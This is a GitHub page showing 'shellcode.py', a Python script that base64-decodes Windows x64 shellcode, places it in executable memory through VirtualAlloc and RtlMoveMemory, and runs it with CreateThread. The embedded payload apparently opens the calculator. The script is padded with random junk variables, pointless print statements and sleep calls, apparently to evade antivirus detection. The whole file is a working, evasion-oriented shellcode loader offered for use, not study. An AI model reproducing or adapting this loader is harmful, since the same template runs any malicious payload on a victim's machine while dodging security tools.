-
Notifications
You must be signed in to change notification settings - Fork 23
Expand file tree
/
Copy pathshellcode.py
More file actions
42 lines (27 loc) · 5.8 KB
/
shellcode.py
File metadata and controls
42 lines (27 loc) · 5.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import ctypes,base64,time
bzhve4ir3k5hi51ct5ceg9zbbyg5qnrekftqimv5f6woe7dejcy69cy6lwkw0efvrnflq66yyfk46cf0025iw3xqy8qd2i4ds6lojub9q56xj5bw3i3t6jblekocy3dnqqmtcbx0p1y3ye1d631z5eshyyjpx7cpjmhvc3fsfm6k8p3qtnrpz90hq291uf04vzlwzrncbiggp09dh73x4fricyl4np3jb9gjckn9qqbw0fkf9o1hawvdjiafqxbc43c8jw5vz3eoz3ime8ovsy4ex9tgiv8y882w89t4efkvnq384itb23chq11mt0lonzczr1qne4rahd0w5g6x7zaq8bddlvi24sk6llpnjbmyn76awcmmx4irv8e14ou1yc60mlq0x76x62np5qyhu0gv5y2ouz9ym20tkp262ci1y9gdcijcuyovl6ldddw49w2b4wacses7oprhero0f8uhbjktcthlsaw11ay9ux9zn1wttc9v0rys4o5b80bq98tahd4gd9uoni14437g16kd9320kob5rbtmo4go06fxyconwbejhc6hw4yx4hzky5vejevyjpz3put2fzb4q1bokc6oa8vl22so9c989wkd64lw2p2cv6diz5izamomqdwbtzc85fi9u0y3vvujbmvb5ohzqlcm1szqpfaff = 7074841 - 24047293
gnkm5nlru5 = base64.b64decode('/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=')
time.sleep(1)
gnkm5nlru5 = bytearray(gnkm5nlru5)
time.sleep(2)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
g7z6o7s5i93jkst0eacs18fp2ts1mfusghtb44mrheha7nj8kror3kvgmfhfhqiayh3tf94dklz70fo8s8ow80o2zfiw3cgra8wyua5ddxvtmytndwemkzgghbno3lkta0j0rzlbxgntzp96td2cjai49fzk6svv2jtrhuu67av7jgs4iq8zpforz235q2hdeyamdu9kh99f0uh2xzm6xvhxikewis4g9vvj1a23fkvcjprziiaxf1l1c6i079nrzob7l3kk99keil8bwzq11oslohu03gijmo8kyh5h1wk8ltfjsnwrh97kzo8d9em110q68iu9wed9sz8sk4nhm45ujp0chlkdmv2kc8rru5rncg56bfjhqo4ocidk9ww1fg7uwnbmtknhk3yn58701a7jvxy93ezifpidy5izg74eoi9fwjpxkbw6dwl62wotgtd6rszdff5kw4suyel6kbs64qpzhtl99z5kk6ug4wb5kq93ixgq85bkpr9ebrivhoevyx4uve92iay3e1rhrbfqft0 = "tz5jbl9zje20dhlb1bh1afx57xuvm32jhftcqery4v8xbhpl8fvoqaldueb7jgmuypl8hniw804ct5ifhoy9ezl9v5wfwc3y75uqq543trpcqwmf5prjq7ibl23t2rsxvb3z3k17alr5wslec3t22rsocsjfccyzvw6ct86mgvjl8wwridkhjni7wiziuyxollh30z6ybxc0sunf35v4mov3z17vto5fbn4vqjtdx3d1wy1yw58g4psdey50qj9xd3ag8xplltvkzvskm39f656sl39lavdejtwlppqmppt73ywmk9amhaeuojc132uplqqotu5d6q6ngbez6drpvf59652x0za633lmw5kjehaqoem9aimz6nr1t74m7gimk75htze2p54lmxft939u7ay5lhpswezr3ritxb4zfoceikdayaltvje7hgjqevjdvengu8wj8f7l9gj0sxjxhvde9eribkj86iyhju6a5gi0n653ym6ysq6nuurvxl48rbwso4" + "hezo6ue4buod8mg7xip5p9ask078v11ck39rz6o47q2wo6bxrhnj8n934u0ai0l2amuy5sirtjnv0vvt9ta6ejh1xjumdbkk5mekizw4krbluyrorddabtlecgkry8f0aovlgfebrl3uittlykdp1r7voweoo1i9br1wwrxsgltpzpcruscuziewf6z0pjhk4smzfk7062puyl5tpqgn8h8nu0uux0glf5jh4ssk8ksudrwmt8gj98wazo19dqfkzj9420oof1yviymffpf5ajtyisflyd9o7itp5bm3vk3o8sg6ruvd9ngtkg00x9s4nayaxlctqmedk908re2ofcs63vrs5z4smsa6hsk9m8fh4h81a87zk0bmk9qocq2aa4shryou6q5rg48w6xditr25kg8oo0vv3hht2sfpa8g370tmgh4a8vzqc5pad6226172a7q8c6ga736yr28pb3us1e9jhn4djuauu6zx6wuvyi6krdj0e16oz84ktx6e0e71n6z3wfp51nmz4sqxylcl0wu7vn6jq3mueb9ln8yvpgaghekorqrjwdu585ny2pz0s158eeajhkqo5gzcsvsseyd4uma4jvmhndu8uou4fmuhx3w6tymo5rxrjnn3"
a5433x = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(gnkm5nlru5)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
print("p25xi0d12izsuk6x8kxhhv1kknfj63a049cpjygrvveoz91es3m6jhq3gnqmst23fqg6bz0s5qocvn3zn5smtn0atmgqn6q4r5w8ujuyjqz1ef2ggabzee0b6f6rtfls8csi9tefqt9hzm6q1bqfy3w3u515hq9s3voa0jd3nmrzn53cmf8iv649io87w4itj51vo8ji6pjr6iwuiv36tqiorw8eqsx2awtw22ii7vou52oatruzuhme6essqucd8bvgdry1tou3xc0vd1xjqbbjblxoqbhajnl76wxjyclsv4o5c6os6lrb31amxf5f0ls21qqkh9al3ooanxqnpz5motigcywgcnhelm31dsaevt8v8726pyf483bxx1mlzyz3slitn1o47s71loz3l70oxmskos0irisazphkvkub7fmbba15ktwgve9qiepeezuhmadowh6wj5og71b0slctfyk71reg5ckqr9fq8y6f94o34v2ers4mtggpf7d8j69e47ttbnrdlwy3hm8bvo5l8cgbk3c82p01b92tzl8s36i36h0lsf111raph4dqru2juyiqbj0mo6uuwsorpqrnfakqpzbs99qoaiyrfpqsaqp2w8secfj90dft4d9tl9ifsol9nvx724sx3jvzncg8cxe6c574ums3daetr8rvzsry6hi3ysqm6nl")
cw4kx3tg = (ctypes.c_char * len(gnkm5nlru5)).from_buffer(gnkm5nlru5)
print("p25xi0d12izsuk6x8kxhhv1kknfj63a049cpjygrvveoz91es3m6jhq3gnqmst23fqg6bz0s5qocvn3zn5smtn0atmgqn6q4r5w8ujuyjqz1ef2ggabzee0b6f6rtfls8csi9tefqt9hzm6q1bqfy3w3u515hq9s3voa0jd3nmrzn53cmf8iv649io87w4itj51vo8ji6pjr6iwuiv36tqiorw8eqsx2awtw22ii7vou52oatruzuhme6essqucd8bvgdry1tou3xc0vd1xjqbbjblxoqbhajnl76wxjyclsv4o5c6os6lrb31amxf5f0ls21qqkh9al3ooanxqnpz5motigcywgcnhelm31dsaevt8v8726pyf483bxx1mlzyz3slitn1o47s71loz3l70oxmskos0irisazphkvkub7fmbba15ktwgve9qiepeezuhmadowh6wj5og71b0slctfyk71reg5ckqr9fq8y6f94o34v2ers4mtggpf7d8j69e47ttbnrdlwy3hm8bvo5l8cgbk3c82p01b92tzl8s36i36h0lsf111raph4dqru2juyiqbj0mo6uuwsorpqrnfakqpzbs99qoaiyrfpqsaqp2w8secfj90dft4d9tl9ifsol9nvx724sx3jvzncg8cxe6c574ums3daetr8rvzsry6hi3ysqm6nl")
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(a5433x),
cw4kx3tg,
ctypes.c_int(len(gnkm5nlru5))
)
print("ixfxd1r99zugybi3az4k7fl7mf1pqj04hjcma5zncv9jiidv4cv9icfi6wtjcmw329ka01vibeh7dnm378n7s2ihj1owsb68y2qqa8s48scq9zxog9ww0k0syyr8z2ss9n2k1au8vrbkh6ljwo9mn82osz1ap95o85x4zddfswfde1sdz50fcen5d0x1ar9aj762f1qyf1p937eg0e5qm1p4dzj7ysqpnrfrruwx6wnneoh1xxqjkv4vnr13gwe8clinifsg7acqwi9pjtrirasz4cwr5yi672bnypvvcn9fl60jursr2rptfci7han6s80cmu9ivuy60wj5duwk8gjxtr06r2vvfyvgic2h9nubl5ke4ek8ic7u1kvcrgi6k75p6lqag5cxcn426wqsd7g2xym77nnvwuk2x7m6fom1a177kq10d3syq7pw871nsxvfrg755wf6bqu4fn7eduhej86z91zexawwqu47q0gfk85681fa3vra21pq2dcum676m8fl3ziv52ewbdd4p04p6csggg8n31ecyrbmddaon08f4ci2zf1sti8v6goucz0b9hcxgemxa9q4n2qpedky064s4x90mwdx3xo5tzntekhwpcfj9i53rpozxvx6ddewdrj9gp4dgnahcwutk4r1hfm946xvrkzwr8136jdg2jj16t1l2yrlylvwmn8fwh1h97hi3m7m61vcyzpoifcuz24wyedr7hb2defvl0veezlxojjapp09rcz9o2iw4enz1hs2wc0om30x70zcl04kzq19t71ekhgi51jz7tc3garvf2nmy5k3he9q4ckso558gwjxty3k3q795u0e0cdz4nw55k5zkf3x6uuabvlgclbyasr0henuz3kl0dg397zmv1focntl4kc79t0ymmbp078o5srvm1")
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(a5433x),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))